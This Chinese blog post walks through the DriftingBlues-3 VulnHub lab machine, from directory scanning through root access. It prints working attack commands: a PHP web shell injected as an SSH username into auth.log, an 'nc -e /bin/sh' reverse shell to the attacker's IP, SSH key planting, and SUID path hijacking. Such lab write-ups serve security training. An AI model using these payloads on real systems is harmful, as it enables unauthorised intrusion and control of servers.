driftingblues3靶机(auth.log日志、命令执行)

最新推荐文章于 2024-05-12 22:19:41 发布
最新推荐文章于 2024-05-12 22:19:41 发布
阅读量666 收藏
点赞数 1
分类专栏: driftingblues系列 文章标签: 安全 php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/128376914
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:yc07

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机开放端口和服务情况

2.用dirsearch扫描出目录

dirsearch -u 192.168.1.101

漏洞探测

1.访问网页

2.看下敏感目录里的信息,不让访问/eventadmins目录

3.访问后知道的信息,三个用户名

john buddy buddyG

4.用curl命令查看源码,发现隐藏信息

5.访问网页后有一段base64编码的密文

curl -i -L http://192.168.1.101/littlequeenofspades.html

6.经过俩次解密,得到一个php网页

echo 'L2FkbWluc2ZpeGl0LnBocA==' | base64 -d

7.查看之后,发现特别像auth.log的内容

curl -i -L http://192.168.1.101/adminsfixit.php

8.查看auth.log日志文件后肯定他就是

漏洞利用

1.故意登录ssh,造成报错,看能否在日志里看到

ssh weiqin@192.168.1.101

2.curl -i -L http://192.168.1.101/adminsfixit.php

等几分钟再执行curl命令,发现成功记录了登陆的信息

3.auth日志会保存尝试ssh登录的用户名而不去校验这个用户名是否合法或在本地存在

那么我们就可以在用户名处注入可以被执行的脚本然后尝试访问他就可以实现RCE命令执行

ssh '<?php system($_GET["cmd"]);?>'@192.168.1.101

curl -i -L http://192.168.1.101/adminsfixit.php?cmd=ls

4.开启监听,用nc来反弹shell

http://192.168.1.101/adminsfixit.php?cmd=nc -e /bin/sh 192.168.1.106 4444

权限提升

1.回弹shell成功后用python来弹交互式shell,在robertj用户下发现.ssh目录

python -c 'import pty;pty.spawn("/bin/bash")'

2.既然有.ssh目录那就上传个秘钥

ssh-keygen

3.本地开启8000端口后,靶机将公钥文件下载下来

python3 -m http.server

wget http://192.168.1.106:8000/id_rsa.pub

4.给authorized_keys权限

chmod 777 authorized_keys

5.直接登录就行了

ssh robertj@192.168.1.101 -i id_rsa

6.查询有suid权限执行的文件

find / -perm -u=s -type f 2>/dev/null

7.看到getinfo

执行getinfo会发现,他是由下面这几个命令构成的

ip a cat /etc/hosts uname -a

8.把ip给替换成可以执行提权的命令,然后把环境变量改了,就可以成功提权

9.最后进入root目录,成功拿下!!!

魏钦6666
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透练习03-driftingblues3
Force~
03-26 1709
靶机地址: https://www.vulnhub.com/entry/driftingblues-3,656/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -s.
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3
Aluxian_的博客
06-15 1589
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址: https://www.vulnhub.com/entry/driftingblues-3,656/下载好了把安装包解压 然后试用VMware即可。 前言:这里又是DriftingBlues-2的问题 需要自己配网卡 具体参考:
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_[vulnhub靶机] driftingblues 3
最新发布
2401_84715513的博客
05-12 431
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。
VulnHub-DRIFTINGBLUES: 3
sanqin_的博客
07-11 586
靶机 DHCP 未能正确分配 IP :看这里 靶机地址:http://www.vulnhub.com/entry/driftingblues-3,656/ 按照流程先用nmap扫描 nmap -sP ip/mask #扫描局域网内存活主机 nmap -sV -A -p- ip #扫描靶机开放服务 可见开发了两个端口,22:ssh,80:http 在网站一阵遨游后没发现啥(其实就随便看看),上dirb robots.txt给出了一个目录 访问,提示说ssh有问题,并且又给出一个目录, 这次页面提
driftingblues 3靶机 wp
m0_52496313的博客
09-19 431
driftingblues 3靶机 wp
Kioptrix2-WalkThrough 靶机复现.docx
10-18
3. 命令执行:使用;pwd 命令来确定当前目录,并执行系统命令。 4. 反弹 shell:使用 nc 命令将 shell 反弹到 Kali 机器上。 5. 提权:使用 CVE-2009-2698 漏洞来提权。 本文的靶机复现过程对新手来说非常友好,...
hack me please靶机攻略.docx
10-19
"hack me please靶机攻略" 本资源为一份详细的靶机攻略文档,涵盖了从主机发现到获取 root 权限的整个过程。下面是从文档提取的关键知识点: 一、主机发现 * 使用 nmap 工具进行主机发现和端口扫描,命令为:...
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
CTF6靶机实战.zip
05-25
3. Linux脚本和系统漏洞利用:深入理解系统漏洞,编写和执行利用脚本。 4. Metasploit Framework:掌握基本的Metasploit操作,如模块选择、参数配置和攻击执行。 通过这个实战,参赛者可以提升自身的网络安全技能,...
ELK stack实战之结合rsyslog分析系统日志(auth.log)
weixin_33801856的博客
10-08 411
打开微信扫一扫,关注微信公众号【数据与算法联盟】 转载请注明出处:http://blog.csdn.net/gamer_gyt 博主微博:http://weibo.com/234654758 Github:https://github.com/thinkgamer 写在前边的话 在之前的文章我么谈到了EL...
auth.log日志查看
weixin_34336526的博客
02-08 5504
2019独角兽企业重金招聘Python工程师标准>>> ...
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3_[vulnhub靶机] driftingblues 3(1)
2401_84715513的博客
05-12 332
日志记录 可以尝试往日志文件写入一句话后门。
靶机20 driftingblues3
honest_gg的博客
11-01 1036
获取标志 难度:简单
DRIFTINGBLUES: 3实战演练
龙狼刺的博客
06-22 483
【代码】DRIFTINGBLUES: 3实战演练。
DriftingBlues-3靶机进行渗透测试
zll___的博客
04-01 241
DriftingBlues-3靶机进行渗透测试
日志提权 /var/log/auth.log
m0_57221101的博客
03-27 3422
首先介绍一下这个日志,这个是ssh的登陆日志,会记录下ssh登录,sudo,su等命令的相关信息,这里需要重点提及的是,会记录下ssh登录时的用户名。 这个文件的权限一般是310所以不会被除root用户外的其他用户直接写入,一般也不能被除root组外的其他用户读取,但是一旦可以被读取,就可以在这上面下文章了 . ## 利用方法 之前说过auth日志会保存尝试ssh登录的用户名而不去校验这个用户名是否合法或在本地存在 那么我们就可以在用户名处注入可以被执行的脚本然后尝试访问他就可以实现RCE命令
麒麟(Kylin V10 SP1)系统auth.log日志重复保存,文件过大问题处理
niuwj666的博客
08-25 1625
9. 重启systemd-journald.service服务,并使用tail -f /var/log/auth.log命令进行实时监控,发现输出的信息不再包含审计日志信息。5. 在Kylin V10 SP1,发现多了一个systemd-journald-audit.socket文件。3. 使用tail -f /var/log/auth.log命令进行实时监控,发现输出的信息主要是审计日志信息。6. 系统启7动了systemd-journald.service服务后,会记录audit日志
"Web安全测试靶机部署实验指南 2021.11.24
本次实验的名称是“安装部署Web安全测试用的靶机”,实验人是杨子浩,日期是2021年11月24日。实验的目的是为了安装并部署一个用于Web安全测试的靶机。 实验的拓扑是在本地环境进行,使用了XAMPP作为服务器软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值